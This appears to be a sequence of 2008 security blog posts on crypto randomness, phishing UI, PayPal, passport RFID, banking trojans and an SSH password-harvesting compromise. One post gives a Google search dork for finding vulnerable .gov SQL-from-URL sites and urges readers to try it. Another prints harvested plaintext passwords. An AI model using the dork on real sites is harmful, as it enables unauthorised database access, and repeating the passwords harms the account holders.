    What is good practice for the OS is good practice for the application. The reason for this is that in the application, we do not know what the lower layers are doing, and especially we don't really know if they are failing or not. This is OK if it is an unimportant or self-checking thing like reading a directory entry -- it either works or it doesn't -- but it is bad for security programming. Especially, it is bad for those parts where we cannot easily test the result. And, randomness is that special sort of crypto that is very very difficult to test for, because by definition, any number can be random. Hence, in high-security programming, we don't trust the randomness of lower layers, and we mix our own [1].

    OpenSSL does this, which is good, but may be doing it poorly. What it (apparently) does is to mix in uninitialised buffers with the OS-supplied randoms, and little else (those who can read the code might confirm this). This is worth something, because there might be some garbage in the uninitialised buffers. The cryptoplumbing trick is to know whether it is worth the effort, and the answer is no: Often, uninitialised buffers are set to zero by lower layers (the compiler, the OS, the hardware), and often, they come from other deterministic places. So for the most part, there is no reasonable likelihood that it will be usefully random, and hence, it takes us too close to von Neumann's famous state of sin.

    Secondly, to take this next-to-zero source and mix it in to the good OS source in a complex, undocumented fashion is not a good idea. Complexity is the enemy of security. It is for this reason that people study the designs like Yarrow and Fortuna and implement general purpose PRNGs very carefully, and implement them in a good solid fashion, in clear APIs and files, with "danger, danger" written all over them. We want people to be suspicious, because the very idea is suspicious.

    Next. Cryptoplumbing involves by its necessity lots of errors and fixes and patches. So, bug reporting channels are very important, and apparently this was used. Debian team "found" the "bug" with an analysis tool called Valgrind. It was duly reported up to OpenSSL, but the handover was muffed. Let's skip the fingerpointing here, the reason it was muffed was that it wasn't obvious what was going on. And, the reason it wasn't obvious looks like the code was too clever for its own good. It tripped up Valgrind (and Purify), it tripped up the Debian programmers, and the fix did not alert the OpenSSL programmers. Complexity is our enemy, always, in security code.

    So what in summary would you do as a risk manager?

    1. Listen for signs of complexity and cuteness. Clobber them when you see them.
    2. Know which areas of crypto are very hard, and which are "simple". Basically, public keys and random generation are both devilish areas. Block ciphers and hashes are not because they can be properly tested. Tune your alarm bells for sensitivity to the hard areas.
    3. If your team has to do something tricky (and we know that randomness is very tricky) then encourage them to do it clearly and openly. Firewall it into its own area: create a special interface, put it in a separate file, and paint "danger, danger" all over it. KISS, which means Keep the Interface Stupidly Simple.
    4. If you are dealing in high-security areas, remember that only application security is good enough. Relying on other layers to secure you is only good for medium-level security, as you are susceptible to divide and conquer.
    5. Do not distribute your own fixes to someone else's distro. Do an application work-around, and notify upstream. (Or, consider 4. above)
    6. These problems will always occur. Tech breaks, get used to it. Hence, a good high-security design always considers what happens when each component fails in its promise. Defence in depth. Systems that fail catastrophically with the failure of one component aren't good systems.
    7. Teach your team to work on the problem, not the people. Discourage fingerpointing; shifting the blame is part of the problem, not the solution. Everyone involved is likely smart, so the issues are likely complex, not superficial (if it was that easy, we would have done it).
    8. Do not believe in your own superiority. Do not believe in the superiority of others. Worry about people on your team who believe in their own superiority. Get help and work it together. Take your best shot, and then ...
    9. If you've made a mistake, own it. That helps others to concentrate on the problem. A lot. In fact, it even helps to falsely own other people's problems, because the important thing is the result.

    [1] A practical example is that which Zooko and I did in SDP1 with the initialising vector (IV). We needed different inputs (not random) so we added a counter, the time *and* some random from the OS. This is because we were thinking like developers, and we knew that it was possible for all three to fail in multiple ways. In essence we gambled that at least one of them would work, and if all three failed together then the user deserved to hang.

    Posted by iang at 05:57 AM | Comments (8) | TrackBack

    May 11, 2008

    Phishing faceoff - Firefox 3 v. the market for your account

    Dria writes up a fine intro to the new Firefox security UI, the thing that forms the front line for phishing protection.

    Basically, the padlock has been replaced with a button that shows a "passport" icon in multiple colours and with explanatory text. Pretty good, although as far as I can see, this means you can no longer *look* and tell what is going on. OK, I'll run with that as an experiment! For now, there are 4 colours: grey, blue, green and yellow. Grey is for no identity, and I guess that also means no TLS although it isn't that clear as encryption edge-cases are not shown. Blue is Good, being the conventional browser security level, and Green is the EV colour for their new enhanced "better than before" identity verification.

    One minus: yellow is now a confusing colour. Before it was the colour of success, now it is the colour of failure (although that failure is easily rectified by clicking to add an exception). As I commented before, we do need the colours to be re-aligned after a period of experimentation. Kudos to Firefox team for taking that one on the chin, if only others were prepared to clearly unwind some well-meaning ideas...

    Second Minus: As many said in comments, the "invalid identity verification" isn't always that, sometimes it is a non-third-party verification. This needs to be distinguished between "identity not 3rd-party verified" and "self-verified."

    Indeed, our old friend, the self-identified or self-signed certificate, is widely used in technical community for local and small scale security systems, so we can see the message "not trusted" and "invalid" are simply wrong. Now, Jonath says that Firefox is planning to do Key Continuity Management, so it may be that the confusing messages get cleaned up then. (I don't know if anyone else has spotted the nexus, but when we take KCM and combine it with 3rd party verifications, sometimes called variously TTP or CVP or certificate authorities, then we get the best of both worlds. It will eventually come, because it is so sensible.)

    One Good Plus: the CA is displayed in all cases where the certificate information is available. This is exceedingly important because it is the CA that does the verification of identity; Firefox only repeats it (which is why the "trusted" message is soooo wrong). Slowly but surely, we have to move the browser UI to pin the assertation on the CA, and we have to move the user to thinking about CAs as competing, branded entities that stand behind their statements. Publically. At least, Firefox has not made the mistake that Microsoft has made with the new IE, which displays the name of the authority in some circumstances, but not others.

    It is important to realise: we can take a few missteps along the way, such as Gerv's noble attempt with the colour yellow. It is very costly to get these UIs built, trialled and tuned, so any experiments have to be taken with an expectation of more improvement in the future. As long as we're moving forward, things are getting better.

    What's all this about? Why is it important? Pop over to Francois' post on stolen accounts to see the real reason:

    (Hat tip to Gunnar again.) Them's hard numbers! A quick eyeball calculation over Francois's numbers reveals that the going price of a well-funded account is 8% of the value. This makes some sense, because getting access to the account details is easy, it's done in bulk, given that the security systems of online banks are so fundamentally and hopelessly flawed. What is more difficult is getting the money out, because, since the arisal of phishing, and the sticking of some of the liability, occasionally, to the banks, the online security teams have done some things to make it a little trickier. So the lion's share goes to the money launderer, who needs to pay a lot more in direct costs to get his hard-stolen loot out.

    How does this relate to Firefox? Phishing arose as an attack on the browser's security UI, so the Firefox team are working to address that issue with KCM, better displays of the CA name that makes the claim, and more clear symbols. The first 2 images above may help you to avoid the 3rd image.

    Unfortunately, the big picture overtook the browser world, so the work is only just starting. Phishing caused massive funds to flow into the attackers, so they invest in any attacks that might return more value. Especially, the attack profile now includes MITM and trojans, so hardening of the browser against inside attacks will be increasingly necessary.

    Remember, the threat is on the node, not on the wire; which gives us an answer to the question that Jonath was posing: Hardening against inside attacks should be on the agenda for future Firefox.

    Posted by iang at 12:44 PM | Comments (0) | TrackBack

    April 22, 2008

    Paypal -- Practical Approaches to Phishing -- open white paper

    Paypal has released a white paper on their approach to phishing. It is mostly good stuff. Here are their Principles:

    1. No Silver Bullet -- We have not identified any one solution that will single-handedly eradicate phishing; nor do we believe one will ever exist. ...

    2. Passive Versus Active Users -- When thinking about account security, we observe two distinct types of users among our customers. The first and far more common is the “passive” user. Passive users expect to be kept safe online with virtually no involvement of their own. They will keep their passwords safe, but they do not look for the “s” in https nor will they install special software packages or look for digital certificates. The active user, on the other hand, is the “see it/touch it/use it” person. They want two-factor authentication, along with every other bell and whistle that PayPal or the industry can provide. Our solution would have to differentiate between and address both of these groups.

    3. Industry Cooperation -- PayPal has been a popular “target of opportunity” for criminals due to our large account base of over 141 million accounts2 and the nature of our global service. However, while we may be an attractive target, we are far from the only one. Phishing is an industry problem, and we believe that we have a responsibility to help lead the industry toward solutions that help protect consumers – and the Internet ecosystem as a whole.

    4. Standards-based -- A preference for solutions based on industry standards could be considered a facet of industry cooperation, but we believe it’s important enough to stand on its own. If phishing is an industry problem, then industry standard solutions will have the widest reach and the least overhead – certainly compared to proprietary solutions. For that reason, we have consistently picked industry standard solutions.

    (Slightly edited.) That's a good start. The white paper explores their strategy, walks through their work with email signing. Short message: tough! No mention of the older generation technologies such as OpenPGP or S/MIME, but instead, they create plugins to handle their signatures:

    To reach the active users who do not access their email through a signature-rendering email client, PayPal started working with Iconix, which offers the Truemark plug-in for many email clients. The software quickly and easily answers the question of “How do I know if a PayPal email is valid?” by rewriting the email inbox page to clearly show which messages have been properly signed.

    That's by way of indicating how poorly tools designed in the early 90s from poor security analysis and wrong threat models are coping with real threats.

    Next part is their work with the browser. It starts:

    4.1 Unsafe browsers

    There is of course, a corollary to safer browsers – what might be called “unsafe browsers.” That is, those browsers which do not have support for blocking phishing sites or for Extended Validation Certificates (a technology we will discuss later in this section). In our view, letting users view the PayPal site on one of these browsers is equal to a car manufacturer allowing drivers to buy one of their vehicles without seatbelts. The alarming fact is that there is a significant set of users who use very old and vulnerable browsers, such as Microsoft’s Internet Explorer 4 or even IE 3. ...

    Unsafe Browsers are a frequent complaint here and in other places. Some good stuff has been done, but it was too little, too late, and we now see the unfortunate damage that has been done. One of these effects was that it is now up to the big website operators, in this case PayPal, to start policing the browsers. Old versions of IE are to be blocked, and a recent warning shot indicates that browsers that don't support EV will be next.

    Next point: Paypal worked through several strategies. Three years ago, they pushed out a Toolbar (similar to the one listed on this blog). However this only works for those who download toolbars, a complaint frequently mentioned. So then Paypal, shifted to working with Microsoft to adopt the technology into IE7, and now they have ridden the adoption curve of IE7 for free.

    Again this is exactly what should have been done: try it in toolbars then adopt it in the browser core. A cheap hint was missed and an expensive hit was scored:

    4.4 Extended Verification SSL Certificates

    Blocking offending sites works very well for passive users. However, we knew we needed to provide visual cues for our active users in the Web browser, much like we did with email signatures in the mail client.
    Fortunately, the safer browsers helped tremendously. Taking advantage of a new type of site certificate called ‘Extended Validation (EV) SSL Certificates,’ newer browsers such as IE 7 highlight the address bar in green when customers are on a Web site that has been determined legitimate. They also display the company name and the certificate authority name. So, by displaying the green glow and company name, these newer browsers make it much easier for users to determine whether or not they’re on the site that they thought they were visiting.

    This is a mixture of misinformation and danger for PayPal. The good part is that the browser, which is the authority on the CAs, now states definitively "Which Site" and also "Who says!" Green is a nice positive colour, too.

    So, when this goes wrong, as it will, the user has more information in order to seek solutions. This shifting of the information back to the user (whether they want it or not) will do much more to causing the alignment of liabilities.

    The bad part is that the browsers did not need a proprietary solution dressed up in a consortium in order to do this. They had indeed added the colour yellow (Firefox) and company name themselves, and the CA name has been an idea that I pushed repeatedly. For the record, Verisign asked for it early on as well. There's nothing special in the real business world about asking for "who says so?"

    So we now have a structural lock-in placed in the browsers which they could have done for free, on their own initiative. Where does this go from here? Well, it certainly helps PayPal in the short term (in the same way that they could have said to users "download Firefox, check the yellow bar and company name"). But beyond that, I see dangers. As I have frequently written about the costs of the security approach before, I'll skip it now.

    Overall, though, I'm pleased with the report. They have recognised that the industry has no solutions (no "silver bullets") and they have to do it themselves. They've implemented many different strategies, discarded some and improved others. Did it work? Yes, see the graph.

    Best of all, they've taken the wraps off and published their findings. One of the clear indications from recent research and breach laws is that opening up the information is critical to success, and that starts with the website people. It's your job, do it, but that doesn't mean you have to do it alone! You can help each other by sharing industry-validated results, which are the only ones of any value.

    To conclude, there are some other strategies that I'll suggest, and if PayPal are reading this, then they too can ask what's going on here:

    a. Get TLS/SNI into Apache and IIS. Why? So that virtual hosted sites -- the 99% -- can use TLS. This will lead grass-roots-style to an explosion in the use of TLS.

    Why's that helpful? (a) it will raise the profile of TLS work enourmously, and that includes server-side and browser-side practices. It will help to re-direct all these resources above into security work in the browser. Right now, 1% of activity is in TLS. Priorities will change dramatically when that goes to 10%, and that means we can count on the browser teams to spend a whole lot more time on it. And (b) if all traffic goes over TLS, this reduces the amount of security work quite considerably because everything is within the TLS security model. Paypal already figured this as "more or less all" their stuff is now under TLS, including the report!

    All browsers have already done their bit for TLS/SNI. Webservers are the laggards. Ask them.

    b. Hardened browser. Now that Firefox, IE and others have done some work to push attacks away from the user, the phishers are attacking the browsers from the inside. So there is a need to really secure the inside against attacks. Indeed Paypal already noted it in the report.

    c. Hardened website. This means *reducing the tech.* The more you please your users, the more you please your attackers.

    d. 2-channel authentication over the transaction. Okay, that's old news, but it bears repeating, because my online payment provider can only give me one of those old RSA fobs.

    e. The browser website interface is here to stay. Which means we are stuck with a pretty poor combination. What's the long term design path? Here's one view: it starts with client-side certificates and opportunistic cryptography. Why? Because otherwise, transactions are naked and vulnerable, and your efforts are piecemeal.

    Which means, don't replace the infrastructure wholesale, but re-tune it in the direction of security. Read the literature on secure transactions, none of it was ever employed in ecommerce, so it means there are lots of opportunities left for you :)

    (Firefox and IE are both doing early components in this area, so ask them what it's about!)

    f. Finally, bite the bullet and understand that your users will revolt one day, if you continue to keep fees high through industry-wide cooperation on lackadaisical fraud practices. High fraud and high loss means high fees which means high profits. One day the users will understand this, and revolt against your excuse. The manner this works is already well known to PayPal and it will happen to you, unless you adopt a competitive approach to fraud and to fees.

    Posted by iang at 02:27 PM | Comments (3) | TrackBack

    April 20, 2008

    Fair Disclosure via blogs? Anyone listening to Pow, Splat, Blech?

    Another message via the medium, this time from someone who knows how to use a remailer, and is therefore anonymous:

    Don't try this at home! (without an anonymizing proxy, anyway)

    Google willingly gives anyone a list of highly vulnerable US Government websites. Just write the following into the search box:

    gimme pow that do some splat

    These are sites that construct blah directly from blech. Most of them would respond to blah that are not supported by the blech-based interface, leaking sensitive information left and right. But quite a few would let you splat the splotches as well, up to and including blamming entire ker-blats.

    You didn't hear it from me.

    OK, that was fun. Problem now is, how does someone I don't know that won't hear it from me get it from someone I didn't hear it from?


    Late Addition: Now that anon has leaked the sensitive command, I realise this is what I first saw on Perilocity's post on WTF. Breach news is worse than politics, a week is ancient history. I can do no better than those guys. Still, to save a click, the basic thing is that you can see the SELECT command on the HTML of the website, and then use that example to craft your own. Here's a story of some sick public servants who Oklahoma city felt the need to share with us all:

    Here's the rest of the message. I think we should all try it. Safety in numbers.

    Just write the following into the search box:
    allinurl:.gov select from where

    These are websites that construct SQL queries directly from the URL. Most of
    them would respond to queries that are not supported by the web-based UI of
    the website, leaking sensitive information left and right. But quite a few
    would let you modify the databases as well, up to and including dropping
    entire tables.

    The only question left is whether I'm not hearing from one anonymous or two? But you're not asking that.

    Posted by iang at 12:38 PM | Comments (2) | TrackBack

    April 16, 2008

    Proving that you know something about security...

    I recently received an (anonymous) comment on the 'silver bullets' paper that ran like this:

    Sellers most certainly still have more information than the vast majority of buyers based on the fact that they spend all of their time making security software.

    That's an important statement, and deserves to be addressed. How can we check that statement? Well, one way is that we could walk over to the world's biggest concentration of sellers and perhaps buyers, and test the waters? The RSA conference! Figuratively, blog-wise, Gunnar does just that:

    I went to RSA to speak with Brian Chess on Breaking Web Services. First time for me to RSA, I generally go to more geek-to-geek conferences like OWASP. It is a little weird to be in such a big convention. There were soooo many vendors yet most of the products in the massive trade show floor would have as much an impact on the security in your system as say plumbing fixtures. What is genuinely strange to me is that every other area in computers improves and yet security stagnates. For years the excuse that security people gave for their field's propensity to lameness is that "no one invests a nickel in security." However, that ain't the case any more and yet most of the products teh suck. This doesn't happen in other areas of computing - databases are vastly better than a decade ago, app servers same, OS same, go right down the list. What gives in security? Where is the innovation?

    This is more or less similar to the paper's selection of quotes. Anecdotally, evidence exists that insiders don't think sellers know enough, on both sides of the fence. However, surveys can be self-selecting (as was my sample of quotes in the paper), and opinions can be wrong. So it is important to realise that we have not proven one way or another, we've simply opened the door to an uncertainty.

    That is, it could be true that sellers don't know enough! How we then go on to show this, one way or another, is a subject for other (many) posts and possibly much more academic research. I don't for a moment think it is reasonable nor scientifically appropriate to prove this in one paper.

    Posted by iang at 07:01 AM | Comments (1) | TrackBack

    April 09, 2008

    another way to track their citizens

    Passports were always meant to help track citizens. According to lore, they were invented in the 19th century to stop Frenchmen evading the draft (conscription), which is still an issue in some countries. BigMac points to a Dutch working paper "Fingerprinting Passports," that indicates that passports can now be used to discriminate against the bearer's country of issue, to a distance of maybe 25cm. Future Napoleons will be happy.

    Because terrorising the reader over breakfast is currently good writing style by governments and media alike, let's highlight the dangers first. The paper speculates:

    Given that we can remotely detect the presence of a passport of a particular country, how could this functionality be abused? One abuse case that has been suggested is a passport bomb, designed to go off if someone with a passport of a certain nationality comes close. One could even send such a bomb by post, say to an embassy. A less spectacular, but possibly more realistic, use of this functionality would by passport thieves, who can remotely check if someone is carrying passport and if it is of a ‘suitable’ nationality, before they decide to rob them.

    From the general fear department, we can also add that overseas travellers sometimes have a fear of being mugged, kidnapped, hijacked or simply shot because of their mere membership of a favourable or unfavourable country.

    Now that we have the FUD off our chest, let's talk details. The trick involves sending a series of commands (up to 4) to the RFID in the passport, each of which are presumably rejected by the passport. The manner of rejection differs from country to country, so a precise fingerprint-of-country can be formed simply by examining each rejection, and then choosing a different command to further narrow the choices.

    How did this happen? I would speculate that the root failure is derived from bureaucrats' never-ending appetite for complex technological solutions to simple problems. In this case, the first root cause is the use of the RFID, being by intention and design something that can be read from up to 10 cm.

    It is inherently attackable, and therefore by definition a very odd choice for security. The second complexity, then, involved implementing something to stop the attackers reading off the RFIDs without permission. The solution to an active read-off attack is encryption, of course! Which leads to our third complexity, a secret key, which is written inside the passport, of course! Which immediately raises issues of brute-forcing (of course!) and, as the paper references, it turns out, brute forcing attacks work on some countries' passports because the secret key is .. poorly chosen.

    All of this complexity, er, solution, means something called Basic Access Control is added to the RFID in order to ensure the use of the secret key. Which means a series of commands meant to defend the RFID. If we factor in the tendency for each country to implement passports entirely alone (because they are more scared of each other than they are of their citizens), we can see that each solution is proprietary and home-grown. To cope with this, the standard was written to be very flexible (of course!). Hence, it permits wide diversity in response to errors.

    Whoops! Security error. In the world of security, we say that one should be precise in what we send, and precise in what we return.

    From that point of view, this is poor security work by the governments of the world, but that's to be expected. The US State Department can now derive some satisfaction from earlier blunders; because of their failure to implement any form of encryption or access control, American passports can be read by all (terrorists and borderists alike), which apparently forced them to add aluminium foil into the passport cover to act as a Faraday cage. Likely, the other countries will now have to follow suit, and the smugness of being sophisticated and advanced in security terms ("we've got BAC!") will be replaced by a dawning realisation that they should have adopted the simpler solutions in the first place.

    Posted by iang at 03:33 AM | Comments (3) | TrackBack

    March 25, 2008

    Pogo reports: big(gest) bank breach was covered up?

    An anomoly surfaces on the breach scene. Lynn reports in comments via dark reading to Pogo:

    With the exception of the Birmingham News, what may be the largest bank breach involving insider theft of data seems to have flown under the mainstream media radar. ...

    In light of the details now available, the breach appears to be the largest bank breach involving insider theft of data in terms of number of customers whose data were stolen. The largest incident to date for insider theft from a financial institution involved the theft of data on 8.5 million customers from Fidelity National Information Services by a subsidiary's employee.

    It is not clear at the time of this writing whether Compass Bank ever notified the more than 1 million customers that their data had been stolen or how it handled disclosure and notification. A request for additional information from Compass Bank was not immediately answered.

    I would guess that the Feds agreed to keep it quiet. And gave the institution a get-out-of-jail card for the disclosure requirement. It would be curious to see the logic, and I'd be skeptical. On the one side, the damage is done, and the potential for a sting or new information would not really be good enough to compensate for a million victims.

    On the other side, maybe they were also able to satisfy themselves that no more damage would be done? It still doesn't cut the mustard, because once identity victims get hit, they need the hard information to clear their credit records.

    But, in the light of yesterday's post, let's see this as an exception to the current US flavour of breach disclosure, and see if it sheds any light on costs of non-disclosure.

    Posted by iang at 08:11 AM | Comments (4) | TrackBack

    March 13, 2008

    Trojan with Everything, To Go!

    more literal evidence of ... well, everything really:

    Targeting over 400 banks (including my own :( ! ) and having the ability to circumvent two-factor authentication are just two of the features that push Trojan.Silentbanker into the limelight. The scale and sophistication of this emerging banking Trojan is worrying, even for someone who sees banking Trojans on a daily basis.

    This Trojan downloads a configuration file that contains the domain names of over 400 banks. Not only are the usual large American banks targeted but banks in many other countries are also targeted, including France, Spain, Ireland, the UK, Finland, Turkey—the list goes on.

    The ability of this Trojan to perform man-in-the-middle attacks on valid transactions is what is most worrying. The Trojan can intercept transactions that require two-factor authentication. It can then silently change the user-entered destination bank account details to the attacker's account details instead. Of course the Trojan ensures that the user does not notice this change by presenting the user with the details they expect to see, while all the time sending the bank the attacker's details instead. Since the user doesn’t notice anything wrong with the transaction, they will enter the second authentication password, in effect handing over their money to the attackers. The Trojan intercepts all of this traffic before it is encrypted, so even if the transaction takes place over SSL the attack is still valid. Unfortunately, we were unable to reproduce exactly such a transaction in the lab. However, through analysis of the Trojan's code it can be seen that this feature is available to the attackers.

    The Trojan does not use this attack vector for all banks, however. *It only uses this route when an easier route is not available*. If a transaction can occur at the targeted bank using just a username and password then the Trojan will take that information, if a certificate is also required the Trojan can steal that too, if cookies are required the Trojan will steal those....

    (spotted by JPM) MITB, MITM, two-factor as silver bullets for online banks, the node is insecure, etc etc.

    About the only thing that is a bit of a surprise is the speed of this attack. We first reported the MITB here around 2 years back, and we are still only seeing reports like the above. Although I said earlier that a big problem with the banking world was that the attacker can spin inside your OODA loop, it would appear that he does not take on every attack.

    See above for some limits: the attacker is finding and pursuing the attacks that are easiest, first. Is this finally the evidence that cryptographers cannot ignore? Crypto alone has proven to not work. It may be theoretically strong, but it is practically brittle, and easily bypassed. A more balanced, risk-based approach is needed. An approach that uses a lot less crypto, and a lot more engineering and user understanding, would be far more efficacious to deliver what users need.

    Posted by iang at 07:18 AM | Comments (2) | TrackBack

    February 20, 2008

    Principle of Redundancy

    In software engineering, it is important to remember the principle of redundancy. Not because it is useful for software, but because it is useful for humans.

    Human beings work continuously with redundancy because most human information processing is soft and fuzzy. How does a system deal with soft, fuzzy results? It takes readings from different sources, as little correlated as possible, and compares them. If three readings from independent sources all suggest the same conclusion, then we are good. If 2 out of 3 say good, then the human brain says "take care," and if 1 out 3 is good, then it is discarded.

    In comments on the last post, Peter G explored the direct question of whether anyone checked the fingerprint of the SSH server:

    I tried to get some data a while back on SSH key checking in response to SSH fuzzy fingerprints (if you're not familiar with fuzzy fingerprints, they create a close-enough fingerprint to the actual target to pass muster in most cases). Because human-subject experimentation requires a lot of paperwork and scrutiny, I thought I'd first try and establish a base rate for SSH fingerprint checking in general. In other words if you set up a new server with a totally different key from the current one, how many people will be deterred?

    So I tried to establish the fingerprint-check rate in a population of maybe a few thousand users.

    It was zero.

    No-one had ever performed an out-of-band check of an SSH fingerprint when it changed.

    Given a base rate of zero, I didn't consider it worthwhile doing the fuzzy fingerprint check :-).

    What is going on here? Three things. For some reason that has never been explained, SSH has never made it easy to check the fingerprint. Like OpenPGP to some extent, the fingerprints have been delivered in incompatible formats across different channels. E.g., my known_hosts file says that a server I know is AAAAB3N.... and the only way to easily see the fingerprint is to simulate a compromise by clearing the cache.

    Secondly, and the point of this post: the fingerprint is only one of the datums that is being displayed. In the last post, I talked about two other pieces of data: One was the failure of server-key matching, and the other was the fallback to password-request.

    The key lesson here is that SSH delivers enough information to do the job: it isn't the fingerprint per se, but the whole package of fingerprint, server-key matching, and precise mode.

    Three data points, albeit rather poorly presented. Which brings us to another point: In practice, this is only good enough in rare and experienced situations. That breach was only picked up because of the circumstances and a good dose of luck.

    This leads us to conclude that SSH is only just good enough, sometimes. Why? Because it is only just good enough for the job; it's circular, because since it has done the job well enough all these years, the security model has not been much improved against the theoretical concept that knocked the theoretical MITM on the head. The third thing is then lack of attacks -- now, however, circumstances are changing, and improvements should take place. (Indeed, if you have a longer perspective, you'll notice that the distros of SSH have been upgrading the security model over the last few years.)

    But, the important upgrades do not want to be in forcing the fingerprint down the throats of the user. Instead, they want to be in the area of redundancy: more uncorrelated soft and fuzzy signals to the user, that work with the brain, not with the old 1990s computer textbooks.

    Hence, and to complete the response to Peter G, this is why the PKI apologists are looking in the wrong area:

    So there is a form of data available, but because it's not very interesting it'll never be written up in a conference paper (there's a longer discussion of fuzzy fingerprints and related stuff in my perpetual-work-in-progress http://www.cs.auckland.ac.nz/~pgut001/pubs/usability.pdf). I've seen this type of authentication referred to as leap-of-faith authentication in a few recent usability papers, and that seems to be a reasonable name for it. That's not saying it's a bad thing, just that you have to know what it is you're getting for your money.


    Yeah, we can all see "leap of faith" as a sort of mental trick to avoid really examining why SSH works and why PKI doesn't or didn't. That is, "oh, but because you make this 'leap of faith' you're not really secure, according to our models. So I don't have to think any more about it."

    The real issue here is again, it worked, enough, for the job. Now the SSH people will think more, and upgrade it, because it is being attacked. I hope, at least!

    The PKI people cannot say that. What they can say is "use TLS/SRP" or some other similar RFC acrophiliac verbage which doesn't translate to anything a user can eat or drink. Hence, the simple answer is, "come back when I can use it."

    Posted by iang at 02:48 PM | Comments (1) | TrackBack

    February 17, 2008

    Say it ain't so? MITM protection on SSH shows its paces...

    For a decade now, SSH has successfully employed a simple opportunistic protection model that solved the shared-key problem. The premise is quite simple: use the information that the user probably knows. It does this by caching keys on first sight, and watching for unexpected changes. This was originally intended to address the theoretical weakness of public key cryptography called MITM or man-in-the-middle.

    Critics of the SSH model, a.k.a. apologists for the PKI model of the Trusted Third Party (certificate authority) have always pointed out that this simply leaves SSH open to a first-time MITM. That is, when some key changes or you first go to a server, it is "unknown" and therefore has to be established with a "leap of faith."

    The SSH defenders claim that we know much more about the other machine, so we know when the key is supposed to change. Therefore, it isn't so much a leap of faith as educated risk-taking. To which the critics respond that we all suffer from click-thru syndrome and we never read those messages, anyway.

    Etc etc, you can see that this argument goes round and round, and will never be solved until we get some data. So far, the data is almost universally against the TTP model (recall phishing, which the high priests of the PKI have not addressed to any serious extent that I've ever seen). About a year or two back, attack attention started on SSH, and so far it has withstood difficulties with no major or widespread results. So much so that we hear very little about it, in contrast to phishing, which is now a 4 year flood of grief.

    After which preamble, I can now report that I have a data point on an attack on SSH! As this is fairly rare, I'm going to report it in fullness, in case it helps. Here goes:

    Yesterday, I ssh'd to a machine, and it said:

    zhukov$ ssh some.where.example.net
    WARNING: RSA key found for host in .ssh/known_hosts:18
    RSA key fingerprint 05:a4:c2:cf:32:cc:e8:4d:86:27:b7:01:9a:9c:02:0f.
    The authenticity of host can't be established but keys
    of different type are already known for this host.
    DSA key fingerprint is 61:43:9e:1f:ae:24:41:99:b5:0c:3f:e2:43:cd:bc:83.
    Are you sure you want to continue connecting (yes/no)?
    

    OK, so I am supposed to know what was going on with that machine, and it was being rebuilt, but I really did not expect SSH to be effected. The ganglia twitch! I asked the sysadm, and he said no, it wasn't him. Hmmm... mighty suspicious.

    I accepted the key and carried on. Does this prove that click-through syndrome is really an irresistable temptation and the archilles heel of SSH, and even the experienced user will fall for it? Not quite. Firstly, we don't really have a choice as sysadms, we have to get in there, compromise or no compromise, and see. Secondly, it is ok to compromise as long as we know it, we assess the risks and take them. I deliberately chose to go ahead in this case, so it is fair to say that I was warned, and the SSH security model did all that was asked of it.

    Key accepted (yes), and onwards! It immediately came back and said:

    iang@somewhere's password:

    Now the ganglia are doing a ninja turtle act and I'm feeling very strange indeed: The apparent thought of being the victim of an actual real live MITM is doubly delicious, as it is supposed to be as unlikely as dying from shark bite. SSH is not supposed to fall back to passwords, it is supposed to use the keys that were set up earlier. At this point, for some emotional reason I can't further divine, I decided to treat this as a compromise and asked my mate to change my password. He did that, and then I logged in.

    Then we checked. Lo and behold, SSH had been reinstalled completely, and a little bit of investigation revealed what the warped daemon was up to: password harvesting. And, I had a compromised fresh password, whereas my sysadm mates had their real passwords compromised:

    $ cat /dev/saux foo@...208 (aendermich) [Fri Feb 15 2008 14:56:05 +0100] iang@...152 (changeme!) [Fri Feb 15 2008 15:01:11 +0100] nuss@...208 (43Er5z7) [Fri Feb 15 2008 16:10:34 +0100] iang@...113 (kash@zza75) [Fri Feb 15 2008 16:23:15 +0100] iang@...113 (kash@zza75) [Fri Feb 15 2008 16:35:59 +0100] $

    The attacker had replaced the SSH daemon with one that insisted that the users type in their passwords. Luckily, we caught it with only one or two compromises.

    In sum, the SSH security model did its job. This time! The fallback to server-key re-acceptance triggered sufficient suspicion, and the fallback to passwords gave confirmation.

    As a single data point, it's not easy to extrapolate but we can point at which direction it is heading:

    • the model works better than its absence would, for this environment and this threat.
    • This was a node threat (the machine was apparently hacked via dodgy PHP and last week's linux kernel root exploit).
    • the SSH model was originally intended to counter an MITM threat, not a node threat.
    • because SSH prefers keys to passwords (machines being more reliable than humans) my password was protected by the default usage,
    • then, as a side-effect, or by easy extension, the SSH model also protects against a security-mode switch.
    • it would have worked for a real MITM, but only just, as there would only have been the one warning.
    • But frankly, I don't care. The compromise of the node was far more serious,
    • and we know that MITM is the least cost-effective breach of all. There is a high chance of visibility and it is very expensive to run.
    • If we can seduce even a small proportion of breach attacks across to MITM work then we have done a valuable thing indeed.

    In terms of our principles, we can then underscore the following:

    • We are still a long way away from seeing any good data on intercept over-the-wire MITMs. Remember: the threat is on the node. The wire is (relatively) secure.
    • In this current context, SSH's feature to accept passwords, and fallback from key-auth to password-auth, is a weakness. If the password mode had been disabled, then an entire area of attack possibilities would have been evaded. Remember: There is only one mode, and it is secure.
    • The use of the information known to me saved me in this case. This is a good example of how to use the principle of Divide and Conquer. I call this process "bootstrapping relationships into key exchanges" and it is widely used outside the formal security industry.

    All in all, SSH did a good job. Which still leaves us with the rather traumatic job of cleaning up a machine with 3-4 years of crappy PHP applications ... but that's another story.



    For those wondering what to do about today's breach, it seems so far:

    • turn all PHP to secure settings. throw out all old PHP apps that can't cope.
    • find an update for your Linux kernel quickly
    • watch out for SSH replacements and password harvesting
    • prefer SSH keys over passwords. The compromises can be more easily cleaned up by re-generating and re-setting the keys, they don't leapfrog so easily, and they aren't so susceptible to what is sometimes called "social engineering" attacks.
    Posted by iang at 04:26 PM | Comments (7) | TrackBack

    January 29, 2008

    Rumours of Skype + SSL breaches: same old story (MITB)

    Skype is the darling child of cryptoplumbers, the application that got everything right, could withstand the scrutiny of the open investigators, and looked like it was designed well. It also did something useful, and had a huge market, putting it head and shoulders of any other crypto application, ever.

    Storms are gathering on the horizon. Last year we saw stories that Skype in China was shipping with intercept plugins. 3 months ago I was told by someone who was non-technical that the German government was intercepting Skype. Research proved her wrong ... and now leaks are proving her right: Slashdot reports on leaked German memos:

